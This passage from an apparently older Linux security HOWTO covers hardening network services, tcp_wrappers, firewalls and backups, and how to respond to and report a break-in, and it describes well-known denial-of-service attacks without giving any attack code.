8.2. System services and tcp_wrappers

 Before you put your Linux system on ANY network the first thing to look at
is what services you need to offer. Services that you do not need to offer
should be disabled so that you have one less thing to worry about and
attackers have one less place to look for a hole.

 There are a number of ways to disable services under Linux. You can look at
your /etc/inetd.conf file and see what services are being offered by your
inetd. Disable any that you do not need by commenting them out (# at the
beginning of the line), and then sending your inetd process a SIGHUP.

 You can also remove (or comment out) services in your /etc/services file.
This will mean that local clients will also be unable to find the service
(i.e., if you remove ftp, and try and ftp to a remote site from that machine
it will fail with an "unknown service" message). It's usually not worth the
trouble to remove services from /etc/services, since it provides no
additional security. If a local person wanted to use ftp even though you had
commented it out, they would make their own client that used the common FTP
port and would still work fine.

 Some of the services you might want to leave enabled are:


<A0><A0>*<2A> ftp

<A0><A0>*<2A> telnet (or ssh)

<A0><A0>*<2A> mail, such as pop-3 or imap

<A0><A0>*<2A> identd


 If you know you are not going to use some particular package, you can also
delete it entirely. rpm -e packagename under the Red Hat distribution will
erase an entire package. Under Debian dpkg --remove does the same thing.

 Additionally, you really want to disable the rsh/rlogin/rcp utilities,
including login (used by rlogin), shell (used by rcp), and exec (used by rsh)
from being started in /etc/inetd.conf. These protocols are extremely insecure
and have been the cause of exploits in the past.

 You should check /etc/rc.d/rc[0-9].d (on Red Hat; /etc/rc[0-9].d on Debian),
and see if any of the servers started in those directories are not needed.
The files in those directories are actually symbolic links to files in the
directory /etc/rc.d/init.d (on Red Hat; /etc/init.d on Debian). Renaming the
files in the init.d directory disables all the symbolic links that point to
that file. If you only wish to disable a service for a particular run level,
rename the appropriate symbolic link by replacing the upper-case S with a
lower-case s, like this:


       root#  cd /etc/rc6.d
       root#  mv S45dhcpd s45dhcpd

 If you have BSD-style rc files, you will want to check /etc/rc* for programs
you don't need.

 Most Linux distributions ship with tcp_wrappers "wrapping" all your TCP
services. A tcp_wrapper (tcpd) is invoked from inetd instead of the real
server. tcpd then checks the host that is requesting the service, and either
executes the real server, or denies access from that host. tcpd allows you to
restrict access to your TCP services. You should make a /etc/hosts.allow and
add in only those hosts that need to have access to your machine's services.

 If you are a home dial up user, we suggest you deny ALL. tcpd also logs
failed attempts to access services, so this can alert you if you are under
attack. If you add new services, you should be sure to configure them to use
tcp_wrappers if they are TCP-based. For example, a normal dial-up user can
prevent outsiders from connecting to his machine, yet still have the ability
to retrieve mail, and make network connections to the Internet. To do this,
you might add the following to your /etc/hosts.allow:

 ALL: 127.

 And of course /etc/hosts.deny would contain:

 ALL: ALL

 which will prevent external connections to your machine, yet still allow you
from the inside to connect to servers on the Internet.

 Keep in mind that tcp_wrappers only protects services executed from inetd,
and a select few others. There very well may be other services running on
your machine. You can use netstat -ta to find a list of all the services your
machine is offering.
-----------------------------------------------------------------------------

8.3. Verify Your DNS Information

 Keeping up-to-date DNS information about all hosts on your network can help
to increase security. If an unauthorized host becomes connected to your
network, you can recognize it by its lack of a DNS entry. Many services can
be configured to not accept connections from hosts that do not have valid DNS
entries.
-----------------------------------------------------------------------------

8.4. identd

 identd is a small program that typically runs out of your inetd server. It
keeps track of what user is running what TCP service, and then reports this
to whoever requests it.

 Many people misunderstand the usefulness of identd, and so disable it or
block all off site requests for it. identd is not there to help out remote
sites. There is no way of knowing if the data you get from the remote identd
is correct or not. There is no authentication in identd requests.

 Why would you want to run it then? Because it helps you out, and is another
data-point in tracking. If your identd is un compromised, then you know it's
telling remote sites the user-name or uid of people using TCP services. If
the admin at a remote site comes back to you and tells you user so-and-so was
trying to hack into their site, you can easily take action against that user.
If you are not running identd, you will have to look at lots and lots of
logs, figure out who was on at the time, and in general take a lot more time
to track down the user.

 The identd that ships with most distributions is more configurable than many
people think. You can disable it for specific users (they can make a .noident
file), you can log all identd requests (We recommend it), you can even have
identd return a uid instead of a user name or even NO-USER.
-----------------------------------------------------------------------------

8.5. Configuring and Securing the Postfix MTA

 The Postfix mail server was written by Wietse Venema, author of Postfix and
several other staple Internet security products, as an "attempt to provide an
alternative to the widely-used Sendmail program. Postfix attempts to be fast,
easy to administer, and hopefully secure, while at the same time being
sendmail compatible enough to not upset your users."

 Further information on postfix can be found at the [http://www.postfix.org]
Postfix home and in the [http://www.linuxsecurity.com/feature_stories/
feature_story-91.html] Configuring and Securing Postfix.
-----------------------------------------------------------------------------

8.6. SATAN, ISS, and Other Network Scanners

 There are a number of different software packages out there that do port and
service-based scanning of machines or networks. SATAN, ISS, SAINT, and Nessus
are some of the more well-known ones. This software connects to the target
machine (or all the target machines on a network) on all the ports they can,
and try to determine what service is running there. Based on this
information, you can tell if the machine is vulnerable to a specific exploit
on that server.

 SATAN (Security Administrator's Tool for Analyzing Networks) is a port
scanner with a web interface. It can be configured to do light, medium, or
strong checks on a machine or a network of machines. It's a good idea to get
SATAN and scan your machine or network, and fix the problems it finds. Make
sure you get the copy of SATAN from [http://metalab.unc.edu/pub/packages/
security/Satan-for-Linux/] metalab or a reputable FTP or web site. There was
a Trojan copy of SATAN that was distributed out on the net. [http://
www.trouble.org/~zen/satan/satan.html] http://www.trouble.org/~zen/satan/
satan.html. Note that SATAN has not been updated in quite a while, and some
of the other tools below might do a better job.

 ISS (Internet Security Scanner) is another port-based scanner. It is faster
than Satan, and thus might be better for large networks. However, SATAN tends
to provide more information.

 Abacus is a suite of tools to provide host-based security and intrusion
detection. Look at it's home page on the web for more information. [http://
www.psionic.com/abacus] http://www.psionic.com/abacus/

 SAINT is a updated version of SATAN. It is web-based and has many more
up-to-date tests than SATAN. You can find out more about it at: [http://
www.wwdsi.com/saint] http://www.wwdsi.com/~saint

 Nessus is a free security scanner. It has a GTK graphical interface for ease
of use. It is also designed with a very nice plug in setup for new
port-scanning tests. For more information, take a look at: [http://
www.nessus.org/] http://www.nessus.org
-----------------------------------------------------------------------------

8.6.1. Detecting Port Scans

 There are some tools designed to alert you to probes by SATAN and ISS and
other scanning software. However, if you liberally use tcp_wrappers, and look
over your log files regularly, you should be able to notice such probes. Even
on the lowest setting, SATAN still leaves traces in the logs on a stock Red
Hat system.

 There are also "stealth" port scanners. A packet with the TCP ACK bit set
(as is done with established connections) will likely get through a
packet-filtering firewall. The returned RST packet from a port that _had no
established session_ can be taken as proof of life on that port. I don't
think TCP wrappers will detect this.

 You might also look at SNORT, which is a free IDS (Intrusion Detection
System), which can detect other network intrusions. [http://www.snort.org]
http://www.snort.org
-----------------------------------------------------------------------------

8.7. sendmail, qmail and MTA's

 One of the most important services you can provide is a mail server.
Unfortunately, it is also one of the most vulnerable to attack, simply due to
the number of tasks it must perform and the privileges it typically needs.

 If you are using sendmail it is very important to keep up on current
versions. sendmail has a long long history of security exploits. Always make
sure you are running the most recent version from [http://www.sendmail.org/]
http://www.sendmail.org.

 Keep in mind that sendmail does not have to be running in order for you to
send mail. If you are a home user, you can disable sendmail entirely, and
simply use your mail client to send mail. You might also choose to remove the
"-bd" flag from the sendmail startup file, thereby disabling incoming
requests for mail. In other words, you can execute sendmail from your startup
script using the following instead:
                # /usr/lib/sendmail -q15m
This will cause sendmail to flush the mail queue every fifteen minutes for
any messages that could not be successfully delivered on the first attempt.

 Many administrators choose not to use sendmail, and instead choose one of
the other mail transport agents. You might consider switching over to qmail.
qmail was designed with security in mind from the ground up. It's fast,
stable, and secure. Qmail can be found at [http://www.qmail.org] http://
www.qmail.org

 In direct competition to qmail is "postfix", written by Wietse Venema, the
author of tcp_wrappers and other security tools. Formerly called vmailer, and
sponsored by IBM, this is also a mail transport agent written from the ground
up with security in mind. You can find more information about postfix at
[http:/www.postfix.org] http://www.postfix.org
-----------------------------------------------------------------------------

8.8. Denial of Service Attacks

 A "Denial of Service" (DoS) attack is one where the attacker tries to make
some resource too busy to answer legitimate requests, or to deny legitimate
users access to your machine.

 Denial of service attacks have increased greatly in recent years. Some of
the more popular and recent ones are listed below. Note that new ones show up
all the time, so this is just a few examples. Read the Linux security lists
and the bugtraq list and archives for more current information.


<A0><A0>*<2A> SYN Flooding - SYN flooding is a network denial of service attack. It
    takes advantage of a "loophole" in the way TCP connections are created.
    The newer Linux kernels (2.0.30 and up) have several configurable options
    to prevent SYN flood attacks from denying people access to your machine
    or services. See Section 7 for proper kernel protection options.

<A0><A0>*<2A> Pentium "F00F" Bug - It was recently discovered that a series of
    assembly codes sent to a genuine Intel Pentium processor would reboot the
    machine. This affects every machine with a Pentium processor (not clones,
    not Pentium Pro or PII), no matter what operating system it's running.
    Linux kernels 2.0.32 and up contain a work around for this bug,
    preventing it from locking your machine. Kernel 2.0.33 has an improved
    version of the kernel fix, and is suggested over 2.0.32. If you are
    running on a Pentium, you should upgrade now!

<A0><A0>*<2A> Ping Flooding - Ping flooding is a simple brute-force denial of service
    attack. The attacker sends a "flood" of ICMP packets to your machine. If
    they are doing this from a host with better bandwidth than yours, your
    machine will be unable to send anything on the network. A variation on
    this attack, called "smurfing", sends ICMP packets to a host with your
    machine's return IP, allowing them to flood you less detectably. You can
    find more information about the "smurf" attack at [http://
    www.quadrunner.com/~chuegen/smurf.txt] http://www.quadrunner.com/~chuegen
    /smurf.txt

     If you are ever under a ping flood attack, use a tool like tcpdump to
    determine where the packets are coming from (or appear to be coming
    from), then contact your provider with this information. Ping floods can
    most easily be stopped at the router level or by using a firewall.

<A0><A0>*<2A> Ping o' Death - The Ping o' Death attack sends ICMP ECHO REQUEST packets
    that are too large to fit in the kernel data structures intended to store
    them. Because sending a single, large (65,510 bytes) "ping" packet to
    many systems will cause them to hang or even crash, this problem was
    quickly dubbed the "Ping o' Death." This one has long been fixed, and is
    no longer anything to worry about.

<A0><A0>*<2A> Teardrop / New Tear - One of the most recent exploits involves a bug
    present in the IP fragmentation code on Linux and Windows platforms. It
    is fixed in kernel version 2.0.33, and does not require selecting any
    kernel compile-time options to utilize the fix. Linux is apparently not
    vulnerable to the "newtear" exploit.


You can find code for most exploits, and a more in-depth description of how
they work, at [http://www.rootshell.com] http://www.rootshell.com using their
search engine.
-----------------------------------------------------------------------------

8.9. NFS (Network File System) Security.

 NFS is a very widely-used file sharing protocol. It allows servers running
nfsd and mountd to "export" entire file systems to other machines using NFS
filesystem support built in to their kernels (or some other client support if
they are not Linux machines). mountd keeps track of mounted file systems in /
etc/mtab, and can display them with showmount.

 Many sites use NFS to serve home directories to users, so that no matter
what machine in the cluster they login to, they will have all their home
files.

 There is some small amount of security allowed in exporting file systems.
You can make your nfsd map the remote root user (uid=0) to the nobody user,
denying them total access to the files exported. However, since individual
users have access to their own (or at least the same uid) files, the remote
root user can login or su to their account and have total access to their
files. This is only a small hindrance to an attacker that has access to mount
your remote file systems.

 If you must use NFS, make sure you export to only those machines that you
really need to. Never export your entire root directory; export only
directories you need to export.

 See the NFS HOWTO for more information on NFS, available at [http://
metalab.unc.edu/mdw/HOWTO/NFS-HOWTO.html] http://metalab.unc.edu/mdw/HOWTO/
NFS-HOWTO.html
-----------------------------------------------------------------------------

8.10. NIS (Network Information Service) (formerly YP).

 Network Information service (formerly YP) is a means of distributing
information to a group of machines. The NIS master holds the information
tables and converts them into NIS map files. These maps are then served over
the network, allowing NIS client machines to get login, password, home
directory and shell information (all the information in a standard /etc/
passwd file). This allows users to change their password once and have it
take effect on all the machines in the NIS domain.

 NIS is not at all secure. It was never meant to be. It was meant to be handy
and useful. Anyone that can guess the name of your NIS domain (anywhere on
the net) can get a copy of your passwd file, and use "crack" and "John the
Ripper" against your users' passwords. Also, it is possible to spoof NIS and
do all sorts of nasty tricks. If you must use NIS, make sure you are aware of
the dangers.

 There is a much more secure replacement for NIS, called NIS+. Check out the
NIS HOWTO for more information: [http://metalab.unc.edu/mdw/HOWTO/
NIS-HOWTO.html] http://metalab.unc.edu/mdw/HOWTO/NIS-HOWTO.html
-----------------------------------------------------------------------------

8.11. Firewalls

 Firewalls are a means of controlling what information is allowed into and
out of your local network. Typically the firewall host is connected to the
Internet and your local LAN, and the only access from your LAN to the
Internet is through the firewall. This way the firewall can control what
passes back and forth from the Internet and your LAN.

 There are a number of types of firewalls and methods of setting them up.
Linux machines make pretty good firewalls. Firewall code can be built right
into 2.0 and higher kernels. The user-space tools ipfwadm for 2.0 kernels and
ipchains for 2.2 kernels, allows you to change, on the fly, the types of
network traffic you allow. You can also log particular types of network
traffic.

 Firewalls are a very useful and important technique in securing your
network. However, never think that because you have a firewall, you don't
need to secure the machines behind it. This is a fatal mistake. Check out the
very good Firewall-HOWTO at your latest metalab archive for more information
on firewalls and Linux. [http://metalab.unc.edu/mdw/HOWTO/
Firewall-HOWTO.html] http://metalab.unc.edu/mdw/HOWTO/Firewall-HOWTO.html

 More information can also be found in the IP-Masquerade mini-howto: [http://
metalab.unc.edu/mdw/HOWTO/mini/IP-Masquerade.html] http://metalab.unc.edu/mdw
/HOWTO/mini/IP-Masquerade.html

 More information on ipfwadm (the tool that lets you change settings on your
firewall, can be found at it's home page: [http://www.xos.nl/linux/ipfwadm/]
http://www.xos.nl/linux/ipfwadm/

 If you have no experience with firewalls, and plan to set up one for more
than just a simple security policy, the Firewalls book by O'Reilly and
Associates or other online firewall document is mandatory reading. Check out
[http://www.ora.com] http://www.ora.com for more information. The National
Institute of Standards and Technology have put together an excellent document
on firewalls. Although dated 1995, it is still quite good. You can find it at
[http://csrc.nist.gov/nistpubs/800-10/main.html] http://csrc.nist.gov/
nistpubs/800-10/main.html. Also of interest:


<A0><A0>*<2A>  The Freefire Project -- a list of freely-available firewall tools,
    available at [http://sites.inka.de/sites/lina/freefire-l/index_en.html]
    http://sites.inka.de/sites/lina/freefire-l/index_en.html

<A0><A0>*<2A>  SunWorld Firewall Design -- written by the authors of the O'Reilly
    book, this provides a rough introduction to the different firewall types.
    It's available at [http://www.sunworld.com/swol-01-1996/
    swol-01-firewall.html] http://www.sunworld.com/swol-01-1996/
    swol-01-firewall.html

<A0><A0>*<2A> Mason - the automated firewall builder for Linux. This is a firewall
    script that learns as you do the things you need to do on your network!
    More info at: [http://www.pobox.com/~wstearns/mason/] http://
    www.pobox.com/~wstearns/mason/


-----------------------------------------------------------------------------
8.12. IP Chains - Linux Kernel 2.2.x Firewalling

 Linux IP Firewalling Chains is an update to the 2.0 Linux firewalling code
for the 2.2 kernel. It has many more features than previous implementations,
including:

<A0><A0>*<2A>  More flexible packet manipulations

<A0><A0>*<2A>  More complex accounting

<A0><A0>*<2A>  Simple policy changes possible atomically

<A0><A0>*<2A>  Fragments can be explicitly blocked, denied, etc.

<A0><A0>*<2A>  Logs suspicious packets.

<A0><A0>*<2A>  Can handle protocols other than ICMP/TCP/UDP.


 If you are currently using ipfwadm on your 2.0 kernel, there are scripts
available to convert the ipfwadm command format to the format ipchains uses.

 Be sure to read the IP Chains HOWTO for further information. It is available
at [http://www.adelaide.net.au/~rustcorp/ipfwchains/ipfwchains.html] http://
www.adelaide.net.au/~rustcorp/ipfwchains/ipfwchains.html
-----------------------------------------------------------------------------

8.13. Netfilter - Linux Kernel 2.4.x Firewalling

 In yet another set of advancements to the kernel IP packet filtering code,
netfilter allows users to set up, maintain, and inspect the packet filtering
rules in the new 2.4 kernel.

 The netfilter subsystem is a complete rewrite of previous packet filtering
implementations including ipchains and ipfwadm. Netfilter provides a large
number of improvements, and it has now become an even more mature and robust
solution for protecting corporate networks.


iptables
is the command-line interface used to manipulate the firewall tables within
the kernel.

 Netfilter provides a raw framework for manipulating packets as they traverse
through various parts of the kernel. Part of this framework includes support
for masquerading, standard packet filtering, and now more complete network
address translation. It even includes improved support for load balancing
requests for a particular service among a group of servers behind the
firewall.

 The stateful inspection features are especially powerful. Stateful
inspection provides the ability to track and control the flow of
communication passing through the filter. The ability to keep track of state
and context information about a session makes rules simpler and tries to
interpret higher-level protocols.

 Additionally, small modules can be developed to perform additional specific
functions, such as passing packets to programs in userspace for processing
then reinjecting back into the normal packet flow. The ability to develop
these programs in userspace reduces the level of complexity that was
previously associated with having to make changes directly at the kernel
level.

 Other IP Tables references include:


<A0><A0>*<2A> [http://www.linuxsecurity.com/feature_stories/feature_story-94.html]
    Oskar Andreasson IP Tables Tutorial -- Oskar Andreasson speaks with
    LinuxSecurity.com about his comprehensive IP Tables tutorial and how this
    document can be used to build a robust firewall for your organization.

<A0><A0>*<2A> [http://www.linuxsecurity.com/feature_stories/feature_story-93.html] Hal
    Burgiss Introduces Linux Security Quick-Start Guides -- Hal Burgiss has
    written two authoritative guides on securing Linux, including managing
    firewalling.

<A0><A0>*<2A> [http://netfilter.samba.org] Netfilter Homepage -- The netfilter/
    iptables homepage.

<A0><A0>*<2A> [http://www.linuxsecurity.com/feature_stories/kernel-netfilter.html]
    Linux Kernel 2.4 Firewalling Matures: netfilter -- This LinuxSecurity.com
    article describes the basics of packet filtering, how to get started
    using iptables, and a list of the new features available in the latest
    generation of firewalling for Linux.


-----------------------------------------------------------------------------
8.14. VPNs - Virtual Private Networks

 VPN's are a way to establish a "virtual" network on top of some
already-existing network. This virtual network often is encrypted and passes
traffic only to and from some known entities that have joined the network.
VPNs are often used to connect someone working at home over the public
Internet to an internal company network.

 If you are running a Linux masquerading firewall and need to pass MS PPTP
(Microsoft's VPN point-to-point product) packets, there is a Linux kernel
patch out to do just that. See: [ftp://ftp.rubyriver.com/pub/jhardin/
masquerade/ip_masq_vpn.html] ip-masq-vpn.

 There are several Linux VPN solutions available:

<A0><A0>*<2A>  vpnd. See the [http://sunsite.dk/vpnd/] http://sunsite.dk/vpnd/.

<A0><A0>*<2A>  Free S/Wan, available at [http://www.xs4all.nl/~freeswan/] http://
    www.xs4all.nl/~freeswan/

<A0><A0>*<2A>  ssh can be used to construct a VPN. See the VPN mini-howto for more
    information.

<A0><A0>*<2A>  vps (virtual private server) at [http://www.strongcrypto.com] http://
    www.strongcrypto.com.

<A0><A0>*<2A> yawipin at [mailto:http://yavipin.sourceforge.net] http://
    yavipin.sourceforge.net


 See also the section on IPSEC for pointers and more information.
-----------------------------------------------------------------------------

9. Security Preparation (before you go on-line)

 Ok, so you have checked over your system, and determined it's as secure as
feasible, and you're ready to put it online. There are a few things you
should now do in order to prepare for an intrusion, so you can quickly
disable the intruder, and get back up and running.
-----------------------------------------------------------------------------

9.1. Make a Full Backup of Your Machine

 Discussion of backup methods and storage is beyond the scope of this
document, but here are a few words relating to backups and security:

 If you have less than 650mb of data to store on a partition, a CD-R copy of
your data is a good way to go (as it's hard to tamper with later, and if
stored properly can last a long time), you will of course need at least 650MB
of space to make the image. Tapes and other re-writable media should be
write-protected as soon as your backup is complete, and then verified to
prevent tampering. Make sure you store your backups in a secure off-line
area. A good backup will ensure that you have a known good point to restore
your system from.
-----------------------------------------------------------------------------

9.2. Choosing a Good Backup Schedule

 A six-tape cycle is easy to maintain. This includes four tapes for during
the week, one tape for even Fridays, and one tape for odd Fridays. Perform an
incremental backup every day, and a full backup on the appropriate Friday
tape. If you make some particularly important changes or add some important
data to your system, a full backup might well be in order.
-----------------------------------------------------------------------------

9.3. Testing your backups

 You should do periodic tests of your backups to make sure they are working
as you might expect them to. Restores of files and checking against the real
data, sizes and listings of backups, and reading old backups should be done
on a regular basis.
-----------------------------------------------------------------------------

9.4. Backup Your RPM or Debian File Database

 In the event of an intrusion, you can use your RPM database like you would
use tripwire, but only if you can be sure it too hasn't been modified. You
should copy the RPM database to a floppy, and keep this copy off-line at all
times. The Debian distribution likely has something similar.

 The files /var/lib/rpm/fileindex.rpm and /var/lib/rpm/packages.rpm most
likely won't fit on a single floppy. But if compressed, each should fit on a
seperate floppy.

 Now, when your system is compromised, you can use the command:


                        root#  rpm -Va
to verify each file on the system. See the rpm man page, as there are a few
other options that can be included to make it less verbose. Keep in mind you
must also be sure your RPM binary has not been compromised.

 This means that every time a new RPM is added to the system, the RPM
database will need to be rearchived. You will have to decide the advantages
versus drawbacks.
-----------------------------------------------------------------------------

9.5. Keep Track of Your System Accounting Data

 It is very important that the information that comes from syslog not be
compromised. Making the files in /var/log readable and writable by only a
limited number of users is a good start.

 Be sure to keep an eye on what gets written there, especially under the auth
facility. Multiple login failures, for example, can indicate an attempted
break-in.

 Where to look for your log file will depend on your distribution. In a Linux
system that conforms to the "Linux Filesystem Standard", such as Red Hat, you
will want to look in /var/log and check messages, mail.log, and others.

 You can find out where your distribution is logging to by looking at your /
etc/syslog.conf file. This is the file that tells syslogd (the system logging
daemon) where to log various messages.

 You might also want to configure your log-rotating script or daemon to keep
logs around longer so you have time to examine them. Take a look at the
logrotate package on recent Red Hat distributions. Other distributions likely
have a similar process.

 If your log files have been tampered with, see if you can determine when the
tampering started, and what sort of things appeared to be tampered with. Are
there large periods of time that cannot be accounted for? Checking backup
tapes (if you have any) for untampered log files is a good idea.

 Intruders typically modify log files in order to cover their tracks, but
they should still be checked for strange happenings. You may notice the
intruder attempting to gain entrance, or exploit a program in order to obtain
the root account. You might see log entries before the intruder has time to
modify them.

 You should also be sure to separate the auth facility from other log data,
including attempts to switch users using su, login attempts, and other user
accounting information.

 If possible, configure syslog to send a copy of the most important data to a
secure system. This will prevent an intruder from covering his tracks by
deleting his login/su/ftp/etc attempts. See the syslog.conf man page, and
refer to the @ option.

 There are several more advanced syslogd programs out there. Take a look at
[http://www.core-sdi.com/ssyslog/] http://www.core-sdi.com/ssyslog/ for
Secure Syslog. Secure Syslog allows you to encrypt your syslog entries and
make sure no one has tampered with them.

 Another syslogd with more features is [http://www.balabit.hu/en/downloads/
syslog-ng/] syslog-ng. It allows you a lot more flexibility in your logging
and also can has your remote syslog streams to prevent tampering.

 Finally, log files are much less useful when no one is reading them. Take
some time out every once in a while to look over your log files, and get a
feeling for what they look like on a normal day. Knowing this can help make
unusual things stand out.
-----------------------------------------------------------------------------

9.6. Apply All New System Updates.

 Most Linux users install from a CD-ROM. Due to the fast-paced nature of
security fixes, new (fixed) programs are always being released. Before you
connect your machine to the network, it's a good idea to check with your
distribution's ftp site and get all the updated packages since you received
your distribution CD-ROM. Many times these packages contain important
security fixes, so it's a good idea to get them installed.
-----------------------------------------------------------------------------

10. What To Do During and After a Breakin

 So you have followed some of the advice here (or elsewhere) and have
detected a break-in? The first thing to do is to remain calm. Hasty actions
can cause more harm than the attacker would have.
-----------------------------------------------------------------------------

10.1. Security Compromise Underway.

 Spotting a security compromise under way can be a tense undertaking. How you
react can have large consequences.

 If the compromise you are seeing is a physical one, odds are you have
spotted someone who has broken into your home, office or lab. You should
notify your local authorities. In a lab, you might have spotted someone
trying to open a case or reboot a machine. Depending on your authority and
procedures, you might ask them to stop, or contact your local security
people.

 If you have detected a local user trying to compromise your security, the
first thing to do is confirm they are in fact who you think they are. Check
the site they are logging in from. Is it the site they normally log in from?
No? Then use a non-electronic means of getting in touch. For instance, call
them on the phone or walk over to their office/house and talk to them. If
they agree that they are on, you can ask them to explain what they were doing
or tell them to cease doing it. If they are not on, and have no idea what you
are talking about, odds are this incident requires further investigation.
Look into such incidents , and have lots of information before making any
accusations.

 If you have detected a network compromise, the first thing to do (if you are
able) is to disconnect your network. If they are connected via modem, unplug
the modem cable; if they are connected via Ethernet, unplug the Ethernet
cable. This will prevent them from doing any further damage, and they will
probably see it as a network problem rather than detection.

 If you are unable to disconnect the network (if you have a busy site, or you
do not have physical control of your machines), the next best step is to use
something like tcp_wrappers or ipfwadm to deny access from the intruder's
site.

 If you can't deny all people from the same site as the intruder, locking the
user's account will have to do. Note that locking an account is not an easy
thing. You have to keep in mind .rhosts files, FTP access, and a host of
possible backdoors.

 After you have done one of the above (disconnected the network, denied
access from their site, and/or disabled their account), you need to kill all
their user processes and log them off.

 You should monitor your site well for the next few minutes, as the attacker
will try to get back in. Perhaps using a different account, and/or from a
different network address.
-----------------------------------------------------------------------------

10.2. Security Compromise has already happened

 So you have either detected a compromise that has already happened or you
have detected it and locked (hopefully) the offending attacker out of your
system. Now what?
-----------------------------------------------------------------------------

10.2.1. Closing the Hole

 If you are able to determine what means the attacker used to get into your
system, you should try to close that hole. For instance, perhaps you see
several FTP entries just before the user logged in. Disable the FTP service
and check and see if there is an updated version, or if any of the lists know
of a fix.

 Check all your log files, and make a visit to your security lists and pages
and see if there are any new common exploits you can fix. You can find
Caldera security fixes at [http://www.caldera.com/tech-ref/security/] http://
www.caldera.com/tech-ref/security/. Red Hat has not yet separated their
security fixes from bug fixes, but their distribution errata is available at
[http://www.redhat.com/errata] http://www.redhat.com/errata

 Debian now has a security mailing list and web page. See: [http://
www.debian.org/security/] http://www.debian.org/security/ for more
information.

 It is very likely that if one vendor has released a security update, that
most other Linux vendors will as well.

 There is now a Linux security auditing project. They are methodically going
through all the user-space utilities and looking for possible security
exploits and overflows. From their announcement:

 ""We are attempting a systematic audit of Linux sources with a view to being
as secure as OpenBSD. We have already uncovered (and fixed) some problems,
but more help is welcome. The list is unmoderated and also a useful resource
for general security discussions. The list address is:
security-audit@ferret.lmh.ox.ac.uk To subscribe, send a mail to:
security-audit-subscribe@ferret.lmh.ox.ac.uk""

 If you don't lock the attacker out, they will likely be back. Not just back
on your machine, but back somewhere on your network. If they were running a
packet sniffer, odds are good they have access to other local machines.
-----------------------------------------------------------------------------

10.2.2. Assessing the Damage

 The first thing is to assess the damage. What has been compromised? If you
are running an integrity checker like Tripwire, you can use it to perform an
integrity check; it should help to tell you what has been compromised. If
not, you will have to look around at all your important data.

 Since Linux systems are getting easier and easier to install, you might
consider saving your config files, wiping your disk(s), reinstalling, then
restoring your user files and your config files from backups. This will
ensure that you have a new, clean system. If you have to restore files from
the compromised system, be especially cautious of any binaries that you
restore, as they may be Trojan horses placed there by the intruder.

 Re-installation should be considered mandatory upon an intruder obtaining
root access. Additionally, you'd like to keep any evidence there is, so
having a spare disk in the safe may make sense.

 Then you have to worry about how long ago the compromise happened, and
whether the backups hold any damaged work. More on backups later.
-----------------------------------------------------------------------------

10.2.3. Backups, Backups, Backups!

 Having regular backups is a godsend for security matters. If your system is
compromised, you can restore the data you need from backups. Of course, some
data is valuable to the attacker too, and they will not only destroy it, they
will steal it and have their own copies; but at least you will still have the
data.

 You should check several backups back into the past before restoring a file
that has been tampered with. The intruder could have compromised your files
long ago, and you could have made many successful backups of the compromised
file!

 Of course, there are also a raft of security concerns with backups. Make
sure you are storing them in a secure place. Know who has access to them. (If
an attacker can get your backups, they can have access to all your data
without you ever knowing it.)
-----------------------------------------------------------------------------

10.2.4. Tracking Down the Intruder.

 Ok, you have locked the intruder out, and recovered your system, but you're
not quite done yet. While it is unlikely that most intruders will ever be
caught, you should report the attack.

 You should report the attack to the admin contact at the site from which the
attacker attacked your system. You can look up this contact with whois or the
Internic database. You might send them an email with all applicable log
entries and dates and times. If you spotted anything else distinctive about
your intruder, you might mention that too. After sending the email, you
should (if you are so inclined) follow up with a phone call. If that admin in
turn spots your attacker, they might be able to talk to the admin of the site
where they are coming from and so on.

 Good crackers often use many intermediate systems, some (or many) of which
may not even know they have been compromised. Trying to track a cracker back
to their home system can be difficult. Being polite to the admins you talk to
can go a long way to getting help from them.

 You should also notify any security organizations you are a part of ([http:/
/www.cert.org/] CERT or similar), as well as your Linux system vendor.
-----------------------------------------------------------------------------

11. Security Sources

 There are a LOT of good sites out there for Unix security in general and
Linux security specifically. It's very important to subscribe to one (or
more) of the security mailing lists and keep current on security fixes. Most
of these lists are very low volume, and very informative.
-----------------------------------------------------------------------------

11.1. LinuxSecurity.com References

 The LinuxSecurity.com web site has numerous Linux and open source security
references written by the LinuxSecurity staff and people collectively around
the world.


<A0><A0>*<2A> [http://www.linuxsecurity.com/vuln-newsletter.html] Linux Advisory Watch
    -- A comprehensive newsletter that outlines the security vulnerabilities
    that have been announced throughout the week. It includes pointers to
    updated packages and descriptions of each vulnerability.

<A0><A0>*<2A> [http://www.linuxsecurity.com/newsletter.html] Linux Security Week --
    The purpose of this document is to provide our readers with a quick
    summary of each week's most relevant Linux security headlines.

<A0><A0>*<2A> [http://www.linuxsecurity.com/general/mailinglists.html] Linux Security
    Discussion List -- This mailing list is for general security-related
    questions and comments.

<A0><A0>*<2A> [http://www.linuxsecurity.com/general/mailinglists.html] Linux Security
    Newsletters -- Subscription information for all newsletters.

<A0><A0>*<2A> [http://www.linuxsecurity.com/docs/colsfaq.html] comp.os.linux.security
    FAQ -- Frequently Asked Questions with answers for the
    comp.os.linux.security newsgroup.

<A0><A0>*<2A> [http://www.linuxsecurity.com/docs/] Linux Security Documentation -- A
    great starting point for information pertaining to Linux and Open Source
    security.


-----------------------------------------------------------------------------
11.2. FTP Sites

 CERT is the Computer Emergency Response Team. They often send out alerts of
current attacks and fixes. See [ftp://ftp.cert.org] ftp://ftp.cert.org for
more information.

 ZEDZ (formerly Replay) ([http://www.zedz.net] http://www.zedz.net) has
archives of many security programs. Since they are outside the US, they don't
need to obey US crypto restrictions.

 Matt Blaze is the author of CFS and a great security advocate. Matt's
archive is available at [ftp://ftp.research.att.com/pub/mab] ftp://
ftp.research.att.com/pub/mab

 tue.nl is a great security FTP site in the Netherlands. [ftp://
ftp.win.tue.nl/pub/security/] ftp.win.tue.nl
-----------------------------------------------------------------------------

11.3. Web Sites


<A0><A0>*<2A> The Hacker FAQ is a FAQ about hackers: [http://www.solon.com/~seebs/faqs
    /hacker.html] The Hacker FAQ

<A0><A0>*<2A> The COAST archive has a large number of Unix security programs and
    information: [http://www.cs.purdue.edu/coast/] COAST

<A0><A0>*<2A>  SuSe Security Page: [http://www.suse.de/security/] http://www.suse.de/
    security/

<A0><A0>*<2A> Rootshell.com is a great site for seeing what exploits are currently
    being used by crackers: [http://www.rootshell.com/] http://
    www.rootshell.com/

<A0><A0>*<2A> BUGTRAQ puts out advisories on security issues: [http://www.netspace.org
    /lsv-archive/bugtraq.html] BUGTRAQ archives

<A0><A0>*<2A> CERT, the Computer Emergency Response Team, puts out advisories on
    common attacks on Unix platforms: [http://www.cert.org/] CERT home

<A0><A0>*<2A> Dan Farmer is the author of SATAN and many other security tools. His
    home site has some interesting security survey information, as well as
